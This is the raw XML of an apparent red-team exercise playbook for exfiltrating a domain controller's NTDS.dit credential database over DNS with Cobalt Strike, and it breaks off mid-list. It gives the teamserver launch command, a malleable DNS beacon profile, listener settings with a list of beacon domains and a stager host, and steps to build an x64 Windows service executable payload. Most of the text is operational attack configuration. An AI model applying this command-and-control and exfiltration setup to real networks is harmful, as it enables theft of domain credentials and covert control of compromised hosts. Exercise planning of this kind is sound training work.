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86B2" w14:textId="02263DB6" w:rsidR="003A0AF8" w:rsidRDefault="00A955FE" w:rsidP="00F51519">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Team 3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PlayBook</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00BD55FD">
        <w:t xml:space="preserve">DNS </w:t>
      </w:r>
      <w:r w:rsidR="005E34E7">
        <w:t>Exfiltration</w:t>
      </w:r>
      <w:r w:rsidR="00F51519">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005E34E7">
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:r w:rsidR="00B23C44">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00365992">
        <w:t>NTDS</w:t>
      </w:r>
      <w:r w:rsidR="00B23C44">
        <w:t>.dit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005E34E7">
        <w:t xml:space="preserve"> File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB32B49" w14:textId="77777777" w:rsidR="00F51519" w:rsidRDefault="005E34E7" w:rsidP="00F51519">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access to the domain controller achieved in the previous step </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D907A71" w14:textId="77777777" w:rsidR="005E34E7" w:rsidRDefault="005E34E7" w:rsidP="00F51519">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Leverage Cobalt Strike to deliver payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604781A0" w14:textId="413A9AC9" w:rsidR="00AF12FA" w:rsidRDefault="00AF12FA" w:rsidP="00AF12FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>The DNS beacons in this environment have been configured specifically to a number of attributable IP’s. These IP’s all currently NAT to 172.30.13.30. Team 3 will stand up this server for the purpose of DNS, other teams will connect via their local clients to affect their assigned blue spaces discussed later in this guide.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EC3862" w14:textId="530FAEC6" w:rsidR="00AF12FA" w:rsidRDefault="00AF12FA" w:rsidP="00AF12FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Team 3 will execute the following to initiate the team server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085D610E" w14:textId="7EE2F728" w:rsidR="00B23C44" w:rsidRDefault="00B23C44" w:rsidP="00AF12FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the Cobalt Strike directory of the Kali system the command is </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>“./</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>teamserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AF12FA">
        <w:t>172.30.13.30</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> password </w:t>
      </w:r>
      <w:r w:rsidR="00AF12FA">
        <w:t>profiles/DNS</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A1B19B" w14:textId="477CDDA7" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="002D2C8E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Malleable DNS profile will share the HTTP/HTTPS configurations as specified by other teams with the following added for DNS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394423E8" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-beacon {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06225E91" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # Options moved into '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-beacon' group in 4.3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9287A3" w14:textId="4BA67350" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns_idle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">             "66.76.76.15";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636A636F" w14:textId="4BA28EB1" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns_max_txt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">          "20";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037596D5" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns_sleep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">            "0";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5128265F" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns_ttl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">              "5";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C54DECF" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maxdns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">               "255";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF46BF0" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns_stager_prepend</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>".</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wwwds</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DDADA0" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>dns_stager_subhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>".e2867.dsca</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="605AD25A" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1744B105" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    # DNS </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>subhost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> override options added in 4.3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4147DCFD" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    set beacon               "d-bx.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF5BD62" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>get_A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">                "d-1ax.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6F52E2" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>get_AAAA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">             "d-4ax.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCB92BA" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>get_TXT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">              "d-1tx.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC8AF54" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>put_metadata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">         "d-1mx";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFB077B" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>put_output</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">           "d-1ox.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155AA4C5" w14:textId="77777777" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ns_response</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">          "A";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C501CB3" w14:textId="5DC47F31" w:rsidR="00E1451C" w:rsidRDefault="00E1451C" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56506D5D" w14:textId="6B06ABC9" w:rsidR="00AF12FA" w:rsidRDefault="00AF12FA" w:rsidP="00AF12FA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This Profile will be available </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01610286" w14:textId="3F115BB9" w:rsidR="00B23C44" w:rsidRDefault="00EF0558" w:rsidP="00B23C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Team 3 will b</w:t>
      </w:r>
      <w:r w:rsidR="00B23C44">
        <w:t xml:space="preserve">uild </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00B23C44">
        <w:t xml:space="preserve">listener </w:t>
      </w:r>
      <w:r w:rsidR="00E1451C">
        <w:t>as a</w:t>
      </w:r>
      <w:r w:rsidR="00B23C44">
        <w:t xml:space="preserve"> DNS beacon with all compromised domains listed in the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B23C44">
        <w:t>hosts</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00E1451C">
        <w:t xml:space="preserve"> w</w:t>
      </w:r>
      <w:r w:rsidR="00B23C44">
        <w:t>indow</w:t>
      </w:r>
      <w:r>
        <w:t>. Other teams will build attacks for their respective blue sections referencing this listener</w:t>
      </w:r>
      <w:r w:rsidR="00E1451C">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AA7725" w14:textId="67E185EF" w:rsidR="00B23C44" w:rsidRDefault="00AF12FA" w:rsidP="00B23C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Connect to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teamserver</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> at 172.30.13.30 via the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cobaltstrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> client </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>gui</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> on your kali instance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DC1A3C" w14:textId="22F71FF3" w:rsidR="00AF12FA" w:rsidRDefault="00AF12FA" w:rsidP="00B23C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Add a listener by selecting the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cobaltstrike</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> button on the top left of your screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D916026" w14:textId="7A02FFF2" w:rsidR="00AF12FA" w:rsidRDefault="00AF12FA" w:rsidP="00B23C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Select listeners from the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>drop down</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> menu. This will spawn a tab at the bottom of the screen on your cobalt strike client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E95A81" w14:textId="46617775" w:rsidR="00AF12FA" w:rsidRDefault="00AF12FA" w:rsidP="00B23C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Select the listener tab and click the add button along the bottom edge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2430AC08" w14:textId="304230EE" w:rsidR="00AF12FA" w:rsidRDefault="00EF0558" w:rsidP="00B23C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">In the “New </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Listner</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” pop up begin filling out the specifics for your listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC45DD3" w14:textId="069A8EF1" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Name: [something relevant and hackery]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726A5DA8" w14:textId="65D435E2" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Payload: Beacon DNS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1924199D" w14:textId="41D3C0ED" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>DNS Hosts: add the following domains,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739D2281" w14:textId="14D850BA" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Thebeaconsarelit.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499DA5E5" w14:textId="496D0967" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Thedreddreport.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770E7E4B" w14:textId="1AC5609A" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Mordor.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2117BF53" w14:textId="71C66FBB" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Floridaman.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B94AE6" w14:textId="5AC88657" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Comiccom.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59D69B8F" w14:textId="388885A8" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Shotinthedark.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687C4AFB" w14:textId="1EA647D7" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Halopower.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1EB455" w14:textId="05FA02F7" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Host Rotation Strategy: random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635064EB" w14:textId="589858D6" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>DNS Host (stager): halopower.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6794E620" w14:textId="0E414E74" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Profile: default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466CFBBF" w14:textId="11DE7D8F" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Save the listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A97D38" w14:textId="1A74FCFF" w:rsidR="00B23C44" w:rsidRDefault="00A41411" w:rsidP="00B23C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidR="00B23C44">
        <w:t>uild the attack in Cobalt Strike</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and host for other red team elements to use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564D463B" w14:textId="77777777" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00B23C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Select ‘</w:t>
      </w:r>
      <w:r w:rsidR="00B23C44">
        <w:t>Attack</w:t>
      </w:r>
      <w:r>
        <w:t>s’</w:t>
      </w:r>
      <w:r w:rsidR="00B23C44">
        <w:t xml:space="preserve"> window </w:t>
      </w:r>
      <w:r>
        <w:t>on the top of your cobalt strike window</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183583DB" w14:textId="1CEE62F8" w:rsidR="00B23C44" w:rsidRDefault="00EF0558" w:rsidP="00B23C44">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Navigate drop down menus to packages </w:t>
      </w:r>
      <w:r w:rsidR="00B23C44">
        <w:t>-&gt; Windows exe</w:t>
      </w:r>
      <w:r>
        <w:t>cutable</w:t>
      </w:r>
      <w:r w:rsidR="0067170D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B23C44">
        <w:t>(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="569AA2C2" w14:textId="6EB5E02B" w:rsidR="00E1451C" w:rsidRDefault="00EF0558" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Select DNS beacon listener as listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19332415" w14:textId="55B5F4EF" w:rsidR="00E1451C" w:rsidRDefault="00EF0558" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Set output to windows service exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A02C92" w14:textId="77777777" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00E1451C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Check use x64 payload box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40824E37" w14:textId="6466F1CD" w:rsidR="00EF0558" w:rsidRDefault="00EF0558" w:rsidP="00EF0558">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
